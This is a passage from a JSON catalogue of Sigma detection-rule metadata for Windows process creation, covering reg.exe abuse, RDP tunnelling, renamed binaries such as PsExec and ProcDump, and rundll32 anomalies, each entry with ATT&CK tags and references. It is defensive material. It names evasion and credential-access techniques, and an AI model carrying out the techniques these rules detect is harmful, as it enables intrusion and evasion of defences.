- "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_rdp.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.lateral_movement",
- "attack.t1021.001",
- "attack.t1112"
- ]
- },
- "uuid": "0d5675be-bc88-4172-86d3-1e96a4476536",
- "value": "Enabling RDP Service via Reg.exe"
- },
- {
- "description": "Detects the import of the '.reg' files from suspicious paths using the 'reg.exe' utility",
- "meta": {
- "author": "frack113, Nasreddine Bencherchali",
- "creation_date": "2022/08/01",
- "falsepositive": [
- "Legitimate import of keys"
- ],
- "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_import_from_suspicious_paths.yml"
- ],
- "tags": [
- "attack.t1112",
- "attack.defense_evasion"
- ]
- },
- "uuid": "62e0298b-e994-4189-bc87-bc699aa62d97",
- "value": "Imports Registry Key From a File Using Reg.exe"
- },
- {
- "description": "Detects reg command lines that disables PPL on the LSA process",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/03/22",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_reg_lsass_ppl.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.010"
- ]
- },
- "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9",
- "value": "Registry Disabling LSASS PPL"
- },
- {
- "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/12/30",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_reg_service_imagepath_change.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1574.011"
- ]
- },
- "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db",
- "value": "Service ImagePath Change with Reg.exe"
- },
- {
- "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.",
- "meta": {
- "author": "Tim Rauch",
- "creation_date": "2022/09/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_remote_desktop_tunneling.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_desktop_tunneling.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1021"
- ]
- },
- "uuid": "8a3038e8-9c9d-46f8-b184-66234a160f6f",
- "value": "Potential Remote Desktop Tunneling"
- },
- {
- "description": "Detects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.",
- "meta": {
- "author": "Tim Rauch",
- "creation_date": "2022/09/27",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_remote_file_download_desktopimgdownldr.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.elastic.co/guide/en/security/current/remote-file-download-via-desktopimgdownldr-utility.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_file_download_desktopimgdownldr.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1105"
- ]
- },
- "uuid": "214641c2-c579-4ecb-8427-0cf19df6842e",
- "value": "Remote File Download via Desktopimgdownldr Utility"
- },
- {
- "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).",
- "meta": {
- "author": "Roberto Rodriguez @Cyb3rWard0g",
- "creation_date": "2019/09/12",
- "falsepositive": [
- "Legitimate usage of remote Powershell, e.g. for monitoring purposes."
- ],
- "filename": "proc_creation_win_remote_powershell_session_process.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_powershell_session_process.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001",
- "attack.t1021.006"
- ]
- },
- "uuid": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8",
- "value": "Remote PowerShell Session Host Process (WinRM)"
- },
- {
- "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.",
- "meta": {
- "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community",
- "creation_date": "2019/10/24",
- "falsepositive": [
- "Legitimate use of the system utilities to discover system time for legitimate reason"
- ],
- "filename": "proc_creation_win_remote_time_discovery.yml",
- "level": "low",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1124"
- ]
- },
- "uuid": "b243b280-65fe-48df-ba07-6ddea7646427",
- "value": "Discovery of a System Time"
- },
- {
- "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files",
- "meta": {
- "author": "frack113",
- "creation_date": "2021/07/07",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_remove_windows_defender_definition_files.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
- "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remove_windows_defender_definition_files.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.001"
- ]
- },
- "uuid": "9719a8aa-401c-41af-8108-ced7ec9cd75c",
- "value": "Remove Windows Defender Definition Files"
- },
- {
- "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.",
- "meta": {
- "author": "Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)",
- "creation_date": "2019/06/15",
- "falsepositive": [
- "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist",
- "PsExec installed via Windows Store doesn't contain original filename field (False negative)"
- ],
- "filename": "proc_creation_win_renamed_binary.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://attack.mitre.org/techniques/T1036/",
- "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html",
- "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.003"
- ]
- },
- "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142",
- "value": "Renamed Binary"
- },
- {
- "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.",
- "meta": {
- "author": "Matthew Green - @mgreen27, Florian Roth",
- "creation_date": "2019/06/15",
- "falsepositive": [
- "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist"
- ],
- "filename": "proc_creation_win_renamed_binary_highly_relevant.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://attack.mitre.org/techniques/T1036/",
- "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html",
- "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary_highly_relevant.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.003"
- ]
- },
- "uuid": "0ba1da6d-b6ce-4366-828c-18826c9de23e",
- "value": "Highly Relevant Renamed Binary"
- },
- {
- "description": "Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)",
- "meta": {
- "author": "Max Altgelt",
- "creation_date": "2022/06/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_browsercore.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/mariuszbit/status/1531631015139102720",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml"
- ],
- "tags": [
- "attack.t1528",
- "attack.t1036.003"
- ]
- },
- "uuid": "8a4519e8-e64a-40b6-ae85-ba8ad2177559",
- "value": "Process Creation with Renamed BrowserCore.exe"
- },
- {
- "description": "Detects execution of renamed ftp.exe binary based on OriginalFileName field",
- "meta": {
- "author": "Victor Sergeev, oscd.community",
- "creation_date": "2020/10/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_ftp.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Ftp/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059",
- "attack.defense_evasion",
- "attack.t1202"
- ]
- },
- "uuid": "277a4393-446c-449a-b0ed-7fdc7795244c",
- "value": "Renamed FTP.EXE Binary Execution"
- },
- {
- "description": "Detects renamed jusched.exe used by cobalt group",
- "meta": {
- "author": "Markus Neis, Swisscom",
- "creation_date": "2019/06/04",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_jusched.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.defense_evasion",
- "attack.t1036.003"
- ]
- },
- "uuid": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb",
- "value": "Renamed jusched.exe"
- },
- {
- "description": "Detects execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag",
- "meta": {
- "author": "frack113, Florian Roth",
- "creation_date": "2022/12/05",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_renamed_mavinject.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md",
- "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e",
- "https://twitter.com/gN3mes1s/status/941315826107510784",
- "https://reaqta.com/2017/12/mavinject-microsoft-injector/",
- "https://twitter.com/Hexacorn/status/776122138063409152",
- "https://github.com/SigmaHQ/sigma/issues/3742",
- "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_mavinject.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055.001",
- "attack.t1218.013"
- ]
- },
- "uuid": "e6474a1b-5390-49cd-ab41-8d88655f7394",
- "value": "Rename Mavinject Execution"
- },
- {
- "description": "Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.",
- "meta": {
- "author": "Sittikorn S",
- "creation_date": "2021/06/22",
- "falsepositive": [
- "Software that illegaly integrates MegaSync in a renamed form",
- "Administrators that have renamed MegaSync"
- ],
- "filename": "proc_creation_win_renamed_megasync.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/rclone-mega-extortion/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218"
- ]
- },
- "uuid": "643bdcac-8b82-49f4-9fd9-25a90b929f3b",
- "value": "Renamed MegaSync"
- },
- {
- "description": "Detects process creation with a renamed Msdt.exe",
- "meta": {
- "author": "pH-T",
- "creation_date": "2022/06/03",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_renamed_msdt.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Msdt/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.003"
- ]
- },
- "uuid": "bd1c6866-65fc-44b2-be51-5588fcff82b9",
- "value": "Renamed Msdt.exe"
- },
- {
- "description": "Detects execution of renamed client32.exe (NetSupport RAT) via Imphash, Product and OriginalFileName strings",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_netsupport_rat.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/misbehaving-rats/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_netsupport_rat.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "0afbd410-de03-4078-8491-f132303cb67d",
- "value": "Execution of Renamed NetSupport RAT"
- },
- {
- "description": "Detects execution of renamed paexec via imphash and executable product string",
- "meta": {
- "author": "Jason Lynch",
- "creation_date": "2019/04/17",
- "falsepositive": [
- "Unknown imphashes"
- ],
- "filename": "proc_creation_win_renamed_paexec.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_paexec.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.003",
- "attack.g0046",
- "car.2013-05-009",
- "attack.execution",
- "attack.t1569.002"
- ]
- },
- "uuid": "7b0666ad-3e38-4e3d-9bab-78b06de85f7b",
- "value": "Execution of Renamed PaExec"
- },
- {
- "description": "Execution of a renamed version of the Plink binary",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/06/06",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_plink.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/",
- "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036"
- ]
- },
- "uuid": "1c12727d-02bf-45ff-a9f3-d49806a3cf43",
- "value": "Execution Of Renamed Plink Binary"
- },
- {
- "description": "Detects the execution of a renamed PowerShell often used by attackers or malware",
- "meta": {
- "author": "Florian Roth, frack113",
- "creation_date": "2019/08/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_powershell.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/christophetd/status/1164506034720952320",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml"
- ],
- "tags": [
- "car.2013-05-009",
- "attack.defense_evasion",
- "attack.t1036.003"
- ]
- },
- "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20",
- "value": "Renamed PowerShell"
- },
- {
- "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/11/18",
- "falsepositive": [
- "Procdump illegaly bundled with legitimate software",
- "Weird admins who renamed binaries (and should be investigated)"
- ],
- "filename": "proc_creation_win_renamed_procdump.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/procdump",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_procdump.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036.003"
- ]
- },
- "uuid": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67",
- "value": "Renamed ProcDump"
- },
- {
- "description": "Detects the execution of a renamed PsExec often used by attackers or malware",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/05/21",
- "falsepositive": [
- "Software that illegaly integrates PsExec in a renamed form",
- "Administrators that have renamed PsExec and no one knows why"
- ],
- "filename": "proc_creation_win_renamed_psexec.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_psexec.yml"
- ],
- "tags": [
- "car.2013-05-009",
- "attack.defense_evasion",
- "attack.t1036.003"
- ]
- },
- "uuid": "a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2",
- "value": "Renamed PsExec"
- },
- {
- "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/06/08",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_rundll32.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2",
- "value": "Renamed Rundll32.exe Execution"
- },
- {
- "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/22",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20",
- "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml"
- ],
- "tags": [
- "attack.execution"
- ]
- },
- "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed",
- "value": "DllRegisterServer Call From Non Rundll32"
- },
- {
- "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/09/19",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_rurat.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/misbehaving-rats/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rurat.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.collection",
- "attack.command_and_control",
- "attack.discovery",
- "attack.s0592"
- ]
- },
- "uuid": "9ef27c24-4903-4192-881a-3adde7ff92a5",
- "value": "Execution of Renamed Remote Utilities RAT (RURAT)"
- },
- {
- "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/09/06",
- "falsepositive": [
- "System administrator usage"
- ],
- "filename": "proc_creation_win_renamed_sdelete.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sdelete.yml"
- ],
- "tags": [
- "attack.impact",
- "attack.t1485"
- ]
- },
- "uuid": "c1d867fe-8d95-4487-aab4-e53f2d339f90",
- "value": "Renamed Sysinternals Sdelete Usage"
- },
- {
- "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading",
- "meta": {
- "author": "elhoim",
- "creation_date": "2022/09/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_vmnat.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/malmoeb/status/1525901219247845376",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002"
- ]
- },
- "uuid": "7b4f794b-590a-4ad4-ba18-7964a2832205",
- "value": "Renamed or Portable Vmnat.exe"
- },
- {
- "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2021/08/12",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_renamed_whoami.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/",
- "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_whoami.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1033",
- "car.2016-03-001"
- ]
- },
- "uuid": "f1086bf7-a0c4-4a37-9102-01e573caf4a0",
- "value": "Renamed Whoami Execution"
- },
- {
- "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.",
- "meta": {
- "author": "oscd.community, @redcanary, Zach Stanford @svch0st",
- "creation_date": "2020/10/10",
- "falsepositive": [
- "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP"
- ],
- "filename": "proc_creation_win_root_certificate_installed.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1553.004"
- ]
- },
- "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc",
- "value": "Root Certificate Installed"
- },
- {
- "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2022/04/13",
- "falsepositive": [
- "Unknown",
- "Some cases in which the service spawned a werfault.exe process"
- ],
- "filename": "proc_creation_win_rpcss_anomalies.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809",
- "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html",
- "https://twitter.com/cyb3rops/status/1514217991034097664",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.t1190",
- "attack.execution",
- "attack.t1569.002"
- ]
- },
- "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16",
- "value": "Remote Procedure Call Service Anomaly"
- },
- {
- "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.",
- "meta": {
- "author": "CD_ROM_",
- "creation_date": "2022/05/21",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_rundll32_parent_explorer.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://redcanary.com/blog/raspberry-robin/",
- "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ]
- },
- "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713",
- "value": "Rundll32 With Suspicious Parent Process"
- },
- {
- "description": "load malicious registered COM objects",
- "meta": {
- "author": "frack113",
- "creation_date": "2022/02/13",
- "falsepositive": [
- "Legitimate use"
- ],
- "filename": "proc_creation_win_rundll32_registered_com_objects.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_registered_com_objects.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.persistence",
- "attack.t1546.015"
- ]
- },
- "uuid": "f1edd233-30b5-4823-9e6a-c4171b24d316",
- "value": "Rundll32 Registered COM Objects"
- },
- {
- "description": "Detects rundll32 execution where the DLL is located on a remote location (share)",
- "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/08/10",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_rundll32_unc_path.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_unc_path.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.execution",
- "attack.t1021.002",
- "attack.t1218.011"
- ]
- },
- "uuid": "5cdb711b-5740-4fb2-ba88-f7945027afac",
- "value": "Rundll32 UNC Path Execution"
- },
- {
- "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module",
- "meta": {
- "author": "Bartlomiej Czyz, Relativity",
- "creation_date": "2021/01/31",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_rundll32_without_parameters.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://bczyz1.github.io/2021/01/30/psexec.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_without_parameters.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1021.002",
- "attack.t1570",
- "attack.execution",
- "attack.t1569.002"
- ]
- },
- "uuid": "5bb68627-3198-40ca-b458-49f973db8752",
- "value": "Rundll32 Without Parameters"
- },
- {
- "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file",
- "meta": {
